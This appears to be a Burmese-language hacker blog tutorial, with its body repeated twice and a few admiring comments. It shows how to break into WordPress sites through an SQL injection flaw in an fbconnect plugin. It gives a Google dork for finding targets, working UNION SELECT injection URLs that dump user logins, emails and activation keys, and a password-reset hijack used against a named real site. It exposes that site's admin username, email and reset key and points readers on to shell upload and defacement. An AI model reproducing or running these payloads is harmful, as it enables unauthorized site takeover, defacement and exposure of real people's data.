WP ကုိ ဟက္ခ်င္ပါတဲ့ဆုိတဲ့ညီအကုိမ်ားအတြက္ ဒီပုိ႔စ္ေလးကအေထာက္အကူျပဳမယ္ထင္ပါတယ္။ ဒီပုိ႔စ္ကနည္းအတုိင္းမလုပ္ခင္ SQL Injection အေၾကာင္းနည္းနည္းပါးပါးနားလည္ရင္ေတာ့ ေကာင္းမယ္ဗ်။ ဘာလုိ႔လဲဆုိေတာ့ ကြ်န္ေတာ္ကုိနည္းေျပာျပေနတဲ့အခ်ိန္မွာ မလုပ္ဖူးေတာ့ ေတာ္ေတာ္ေခါင္းစားလုိ႔ပါ။ အေျခမခုိင္ေတာ့ ဟီး ကဲဗ်ာ ဒီေန႔ေတာ့ ကြ်န္ေတာ္ ဆရာတစ္ေယာက္ေျပာျပတဲ့နည္းကုိ ျပန္ရွယ္ေပးလုိက္ပါတယ္။ wp ကုိဟက္ခ်င္တယ္ေျပာတဲ့ ညီအကုိမ်ားအတြက္ပါ။ (မ်ဳိးၾကီးေလသံျဖင့္ :D) ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ vul ျဖစ္ေနတဲ့ ဆုိဒ္ေတြကုိရွာရပါမယ္။ ဒီေတာ့ Google မွာေအာက္က Dork ေလးနဲ႔အရင္ရွာလုိက္ပါ။
Dork: inurl:"fbconnect_action=myhome"
ကဲ အဲဒီလင့္ေတြအမ်ားၾကီးထဲမွာ 10,7,6 ဆုိတာပါရင္ SQL Vul ျဖစ္ေနတဲ့ဆုိဒ္ျဖစ္ပါတယ္။ လင့္ေတြကုိဝင္ၾကည့္ျပီးရွာၾကည့္ေပါ့ေနာ္။ကြ်န္ေတာ္နမူနာျပထားတဲ့ဆုိဒ္ကုိ ေအာက္မွာေသခ်ာၾကည့္လုိက္ပါ။
sqli =>
site.com/fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12-- In My case,
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
ဟုတ္ျပီဗ်ာ။ ဝုိင္းထားတဲ့ေနရာမွာ ကြ်န္ေတာ္တုိ႔ရွာေနတဲ့ vul နဲ႔ကုိက္ပါျပီ။ ဒါက SQL ေပါက္ေနတာပါ။
Stato:
Nome: 10
Membro da: 7
Website URL: 6
ကဲ ေနာက္တစ္ဆင့္ကေတာ့ table prefix ကုိစစ္မယ္ဗ်ာ။ အသုံးျပဳရမယ့္ဟာကေတာ့
sqli=>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()--
ျဖစ္ပါတယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12-- ဒီေနရာမွာ http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()-- ဒီလုိေလးအစားထုိးေပးလုိက္တာေပါ့ေနာ္။ ဒါဆုိရင္ ေအာက္ကလုိေတြ႕ရပါမယ္။
ဒါဆုိရင္ အေပၚက ပုံမွာျပထားတဲ့အတုိင္း wp_ prefix ေတြကုိ ip2nation,ip2nationCountries,wp_Counterize,wp_Counterize_Keywords,wp_Counterize_Pages ဝုိင္းထားသလုိမ်ဳိးျမင္ေနရပါျပီ။ ဒီအဆင့္ထိေအာင္ျမင္ျပီဆုိ ေနာက္တစ္ဆင့္ကုိသြားမယ္ဗ်ာ။
sqli =>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email),8,9,10,11,12+from+wp_users--
ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ ဒီလုိေလးအစားထုိးျပီး ေခၚၾကည့္လုိက္မယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users-- ဒါကေတာ့ အဲဒီဆုိဒ္မွာရွိတဲ့ username, email address ကုိလွမ္းျပီးႏွိက္ၾကည့္တဲ့ SQL တစ္ခုေပါ့ေနာ္။ ဒါဆုိရင္ ဆုိဒ္မွာ သုံးထားတဲ့ username, email address ကုိေတြ႕ရပါျပီ။ ဒါကုိခဏမွတ္ထားေပးပါ။ ေနာက္တစ္ခါျပန္သုံးရမွာမုိ႔ပါ။
Stato:
Nome: 10
Membro da: 2:Rudy::r.checchin@gmail.com
Website URL: 6
ဒီေတာ့ Username က Rudy, email address က r.checchin@gmail.com ဆုိျပီးသိရပါျပီ။ေနာက္တစ္ဆင့္သြားမယ္ဗ်ာ။ အဲဒီဆုိဒ္ရဲ႕ admin login panel ကုိသြားပါ။ ျပီးရင္ password ေမ့သြားပါတယ္ဆုိျပီး Request လုပ္လုိက္မယ္။ http://www.wildwind.it/wp-admin/
ဒါဆုိရင္ Password Forget တဲ့အတြက္ Recover ျပန္လုပ္ဖုိ႔ သူက သက္ဆုိင္ရာ email ဆီ activate လုပ္ဖုိ႔ျပင္ဆင္ပါလိမ့္မယ္။ ဒီေတာ့ ခုနက ကြ်န္ေတာ္တုိ႔ရထားတဲ့ email နဲေအာက္လုိျဖည့္ေပးျပီး Enter ေခါက္ေပးလုိက္ေပါ့ဗ်ာ။ ကဲ လာျပီ။ ေနာက္တစ္ခု။
ျပီးရင္ ေအာက္ကပုံအတုိင္းေတြ႕ရပါမယ္။ Box ႏွစ္ခုလုံးမွာ ဘာမွမေရးဘဲ ခဏခ်န္ထားလုိက္ပါ။
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users-- ျပီးရင္ ေစာေစာက မွတ္ထားတာေလး ျပန္ၾကည့္မယ္။ အဲဒီမွာ user name က Rudy, Activation key က hSTGEM9iWvnryRgJL6tz ျဖစ္ပါတယ္။
ဒီေတာ့ username, activation key ကုိ ဒီေနရာေလးမွာ အစားထုိးေပးရမွာျဖစ္ပါတယ္။
http://www.wildwind.it/wp-login.php?action=rp&key=key&login=username
ဒါဆုိရင္ ေအာက္ကအတုိင္း ျဖစ္သြားမွာပါ။
www.wildwind.it/wp-login.php?action=rp&key=hSTGEM9iWvnryRgJL6tz&login=Rudy
အဲဒီမွာ ကုိယ္လုိခ်င္တဲ့ password ရုိက္ထည့္ေပးရုံပါပဲ။ ထုံးစံအတုိင္းႏွစ္ခါမွန္ေအာင္ရုိက္ေပးလုိက္ပါ။
ဒါဆုိရင္ ေအာက္ကလုိ Accept ျဖစ္သြားပါမယ္။
ကဲ ေနာက္ဆုံးအဆင့္ေရာက္ပါျပီ။ wp-admin ကုိျပန္သြားျပီး ခုနက ကြ်န္ေတာ္တုိ႔ေပးထားတဲ့ password အသစ္နဲ႔ login ဝင္ႏုိင္ပါျပီ။ username က Rudy ေနာ္။ http://www.wildwind.it/wp-admin
Bravo! I'm in :D
ကဲ ဒါဆုိရင္ေတာ့ shell တင္မယ္။ ေနာက္ Deface တင္လုိ႔ရပါျပီ။ shell တင္နည္းကုိေတာ့ ဒီ မွာျပန္ၾကည့္ႏုိင္ပါတယ္။ Deface တင္နည္းကုိလည္း ဒီ မွာၾကည့္ႏုိင္ပါတယ္။ အဆင္ေျပၾကပါေစ။
Special Thanks to: $0m30n3 (BMH)
Dork: inurl:"fbconnect_action=myhome"
ကဲ အဲဒီလင့္ေတြအမ်ားၾကီးထဲမွာ 10,7,6 ဆုိတာပါရင္ SQL Vul ျဖစ္ေနတဲ့ဆုိဒ္ျဖစ္ပါတယ္။ လင့္ေတြကုိဝင္ၾကည့္ျပီးရွာၾကည့္ေပါ့ေနာ္။ကြ်န္ေတာ္နမူနာျပထားတဲ့ဆုိဒ္ကုိ ေအာက္မွာေသခ်ာၾကည့္လုိက္ပါ။
sqli =>
site.com/fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12-- In My case,
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
ဟုတ္ျပီဗ်ာ။ ဝုိင္းထားတဲ့ေနရာမွာ ကြ်န္ေတာ္တုိ႔ရွာေနတဲ့ vul နဲ႔ကုိက္ပါျပီ။ ဒါက SQL ေပါက္ေနတာပါ။
Stato:
Nome: 10
Membro da: 7
Website URL: 6
ကဲ ေနာက္တစ္ဆင့္ကေတာ့ table prefix ကုိစစ္မယ္ဗ်ာ။ အသုံးျပဳရမယ့္ဟာကေတာ့
sqli=>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()--
ျဖစ္ပါတယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12-- ဒီေနရာမွာ http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()-- ဒီလုိေလးအစားထုိးေပးလုိက္တာေပါ့ေနာ္။ ဒါဆုိရင္ ေအာက္ကလုိေတြ႕ရပါမယ္။
ဒါဆုိရင္ အေပၚက ပုံမွာျပထားတဲ့အတုိင္း wp_ prefix ေတြကုိ ip2nation,ip2nationCountries,wp_Counterize,wp_Counterize_Keywords,wp_Counterize_Pages ဝုိင္းထားသလုိမ်ဳိးျမင္ေနရပါျပီ။ ဒီအဆင့္ထိေအာင္ျမင္ျပီဆုိ ေနာက္တစ္ဆင့္ကုိသြားမယ္ဗ်ာ။
sqli =>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email),8,9,10,11,12+from+wp_users--
ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ ဒီလုိေလးအစားထုိးျပီး ေခၚၾကည့္လုိက္မယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users-- ဒါကေတာ့ အဲဒီဆုိဒ္မွာရွိတဲ့ username, email address ကုိလွမ္းျပီးႏွိက္ၾကည့္တဲ့ SQL တစ္ခုေပါ့ေနာ္။ ဒါဆုိရင္ ဆုိဒ္မွာ သုံးထားတဲ့ username, email address ကုိေတြ႕ရပါျပီ။ ဒါကုိခဏမွတ္ထားေပးပါ။ ေနာက္တစ္ခါျပန္သုံးရမွာမုိ႔ပါ။
Stato:
Nome: 10
Membro da: 2:Rudy::r.checchin@gmail.com
Website URL: 6
ဒီေတာ့ Username က Rudy, email address က r.checchin@gmail.com ဆုိျပီးသိရပါျပီ။ေနာက္တစ္ဆင့္သြားမယ္ဗ်ာ။ အဲဒီဆုိဒ္ရဲ႕ admin login panel ကုိသြားပါ။ ျပီးရင္ password ေမ့သြားပါတယ္ဆုိျပီး Request လုပ္လုိက္မယ္။ http://www.wildwind.it/wp-admin/
ဒါဆုိရင္ Password Forget တဲ့အတြက္ Recover ျပန္လုပ္ဖုိ႔ သူက သက္ဆုိင္ရာ email ဆီ activate လုပ္ဖုိ႔ျပင္ဆင္ပါလိမ့္မယ္။ ဒီေတာ့ ခုနက ကြ်န္ေတာ္တုိ႔ရထားတဲ့ email နဲေအာက္လုိျဖည့္ေပးျပီး Enter ေခါက္ေပးလုိက္ေပါ့ဗ်ာ။ ကဲ လာျပီ။ ေနာက္တစ္ခု။
ျပီးရင္ ေအာက္ကပုံအတုိင္းေတြ႕ရပါမယ္။ Box ႏွစ္ခုလုံးမွာ ဘာမွမေရးဘဲ ခဏခ်န္ထားလုိက္ပါ။
ဒီေတာ့ username, activation key ကုိ ဒီေနရာေလးမွာ အစားထုိးေပးရမွာျဖစ္ပါတယ္။
http://www.wildwind.it/wp-login.php?action=rp&key=key&login=username
ဒါဆုိရင္ ေအာက္ကအတုိင္း ျဖစ္သြားမွာပါ။
www.wildwind.it/wp-login.php?action=rp&key=hSTGEM9iWvnryRgJL6tz&login=Rudy
အဲဒီမွာ ကုိယ္လုိခ်င္တဲ့ password ရုိက္ထည့္ေပးရုံပါပဲ။ ထုံးစံအတုိင္းႏွစ္ခါမွန္ေအာင္ရုိက္ေပးလုိက္ပါ။
ဒါဆုိရင္ ေအာက္ကလုိ Accept ျဖစ္သြားပါမယ္။
ကဲ ေနာက္ဆုံးအဆင့္ေရာက္ပါျပီ။ wp-admin ကုိျပန္သြားျပီး ခုနက ကြ်န္ေတာ္တုိ႔ေပးထားတဲ့ password အသစ္နဲ႔ login ဝင္ႏုိင္ပါျပီ။ username က Rudy ေနာ္။ http://www.wildwind.it/wp-admin
Bravo! I'm in :D
ကဲ ဒါဆုိရင္ေတာ့ shell တင္မယ္။ ေနာက္ Deface တင္လုိ႔ရပါျပီ။ shell တင္နည္းကုိေတာ့ ဒီ မွာျပန္ၾကည့္ႏုိင္ပါတယ္။ Deface တင္နည္းကုိလည္း ဒီ မွာၾကည့္ႏုိင္ပါတယ္။ အဆင္ေျပၾကပါေစ။
Special Thanks to: $0m30n3 (BMH)
very rare tut bro, carry on bro .
ReplyDeletecheer (y).
I'm hopping for next trip :(